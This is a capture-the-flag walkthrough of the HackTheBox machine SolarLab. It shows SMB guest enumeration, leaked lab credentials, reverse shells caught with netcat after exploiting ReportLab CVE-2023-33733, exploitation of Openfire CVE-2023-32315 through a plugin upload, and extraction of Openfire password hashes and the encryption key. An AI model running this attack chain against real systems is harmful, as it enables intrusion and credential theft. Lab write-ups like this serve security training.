SolarLab is a medium-difficulty Windows machine from HackTheBox, it initially deals sensitive information leak through SMB that allows us dashboard access to ReportHub via CVE-2023-33733 for our user flag. As for root, it deals with exposing the internal Openfire application and exploiting CVE-2023-32315 in order to gain remote code execution and decrypting some openfire database credentials to reach out Administrator. Fun box to tackle :)
PS C:\Users\0xkujen> nmap -A-Pn-p--T410.129.231.39 Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-1917:12 W. Central Africa Standard Time NSOCK ERROR [0.2590s] ssl_init_helper(): OpenSSL legacy provider failed to load. Nmap scan report for10.129.231.39 Host is up (0.091s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http nginx 1.24.0 |_http-title: Did not follow redirect to http://solarlab.htb/ |_http-server-header: nginx/1.24.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 6791/tcp open http nginx 1.24.0 |_http-title: Did not follow redirect to http://report.solarlab.htb:6791/ |_http-server-header: nginx/1.24.0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP|7 (89%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 12559.00 ms 10.10.16.1 22559.00 ms 10.129.231.39
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in508.86 seconds
We can see that we have a web application running port 80 and 6791. The latter is redirecting us to http://report.solarlab.htb:6791/, so letβs go ahead and add that to our /etc/hosts file.
SMB - 445
Since port 445 is open letβs check for any smb shares that we might be able to access:
βββ(kaliγΏkali)-[~/hackthebox/solarlab] ββ$ smbclient //solarlab.htb/Documents -U Guest Password for [WORKGROUP\Guest]: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Fri Apr 26 10:47:14 2024 .. DR 0 Fri Apr 26 10:47:14 2024 concepts D 0 Fri Apr 26 10:41:57 2024 desktop.ini AHS 278 Fri Nov 17 05:54:43 2023 details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023 My Music DHSrn 0 Thu Nov 16 14:36:51 2023 My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023 My Videos DHSrn 0 Thu Nov 16 14:36:51 2023 old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1898529 blocks available smb: \> mget * Get file desktop.ini? y getting file \desktop.ini of size 278 as desktop.ini (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec) Get file details-file.xlsx? y getting file \details-file.xlsx of size 12793 as details-file.xlsx (37.1 KiloBytes/sec) (average 19.7 KiloBytes/sec) Get file old_leave_request_form.docx? y getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (67.6 KiloBytes/sec) (average 41.4 KiloBytes/sec) smb: \> exit
We find a few files that we download and checking the excel sheet we find some intersting stuff: Excel Sheet
I also notice that the usernames we just acquired have different formats: firstname.lastname, firtsnameL. So I tried to login using the usernamesβ different formats and passwords, and got a valid login for BlakeB:ThisCanB3typedeasily1@, and we are in: Dashboard
Googling for some exploits withing ReportHub, I stumbled upon CVE-2023-33733 which is a Code Execution Vulnerability in ReportLab python Library which will grant us a reverse shell on the system: CVE
And we are in:
1 2 3 4 5 6 7 8 9 10 11 12
PS C:\Users\0xkujen> nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.231.39] 50711 Windows PowerShell running as user blake on SOLARLAB Copyright (C) 2015 Microsoft Corporation. All rights reserved.
Mode LastWriteTime Length Name --------------------------- d-----11/16/20239:39 PM Common Files d-----4/26/20244:39 PM Internet Explorer d-----11/17/202310:04 AM Java d-----11/16/20239:47 PM Microsoft Update Health Tools d-----12/7/201911:14 AM ModifiableWindowsApps d-----11/17/20232:22 PM Openfire d-----4/26/20242:38 PM RUXIM d-----5/3/20242:34 PM VMware d-----11/16/202311:12 PM Windows Defender d-----4/26/20244:39 PM Windows Defender Advanced Threat Protection d-----11/16/202310:11 PM Windows Mail d-----11/16/202310:11 PM Windows Media Player d-----4/26/20244:39 PM Windows Multimedia Platform d-----12/7/201911:50 AM Windows NT d-----11/16/202310:11 PM Windows Photo Viewer d-----4/26/20244:39 PM Windows Portable Devices d-----12/7/201911:31 AM Windows Security d-----12/7/201911:31 AM WindowsPowerShell
PS C:\>
Looking for openfire CVEs, I stumbled upon CVE-2023-32315 which requires openfire to be exposed on port 9090, checking our network connections we actually find the system listening on 9090:
For the exploit to work, we just have to upload a openfire-management-tool-plugin.jar file that will give us a server management tool with a default password of 123:
Openfire
We now head over to server => server settings => Management Tool, and we have command execution: Openfire
Letβs get a shell again :)
1 2 3 4 5 6 7 8 9 10 11
βββ(kaliγΏkali)-[~] ββ$ rlwrap nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.231.39] 50801 Windows PowerShell running as user openfire on SOLARLAB Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files\Openfire\embedded-db> cat openfire.log /*C2*/SET SCHEMA PUBLIC DELETE FROM OFPROPERTY WHERE NAME='update.lastCheck' INSERT INTO OFPROPERTY VALUES('update.lastCheck','1726761418536',0,NULL) COMMIT INSERT INTO OFUSER VALUES('i0uve6',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'001726769280888','001726769280888') COMMIT DELETE FROM OFUSER WHERE USERNAME='i0uve6' INSERT INTO OFUSER VALUES('i0uve6','VNGmwfXwdo9wfY2nkriUkaJi8Ec=','C8qYvY6k+/+jo9GBh+Xbl1dHNcc=','ZMM5aglF85dyWmtxnCPLUhxWMy0ACDpi',4096,NULL,'83de4c9dc7043ae63713c55a0fc58b0048a84bb5a3202174',NULL,NULL,'001726769280888','001726769280888') COMMIT INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','[email protected],[email protected]',0,NULL) COMMIT DELETE FROM OFID WHERE IDTYPE=25 INSERT INTO OFID VALUES(25,4) COMMIT INSERT INTO OFSECURITYAUDITLOG VALUES(3,'i0uve6',1726769313246,'Successful admin console login attempt','solarlab.htb','The user logged in successfully to the admin console from address 127.0.0.1. ') COMMIT DELETE FROM OFID WHERE IDTYPE=25 INSERT INTO OFID VALUES(25,5) COMMIT INSERT INTO OFSECURITYAUDITLOG VALUES(4,'i0uve6',1726769468048,'uploaded plugin ','solarlab.htb',NULL) COMMIT DELETE FROM OFID WHERE IDTYPE=25 INSERT INTO OFID VALUES(25,6) COMMIT INSERT INTO OFSECURITYAUDITLOG VALUES(5,'i0uve6',1726769484353,'uploaded plugin openfire-management-tool-plugin.jar','solarlab.htb',NULL) COMMIT PS C:\Program Files\Openfire\embedded-db>
It contains a user named admin, now checking openfire.script we find an encrypted admin password:
1
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')
In order to be able to decrypt a openfire password, I used this tool The tool needs the blowfish key:
Openfire
Which we can easily acquire from the script file:
1 2
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
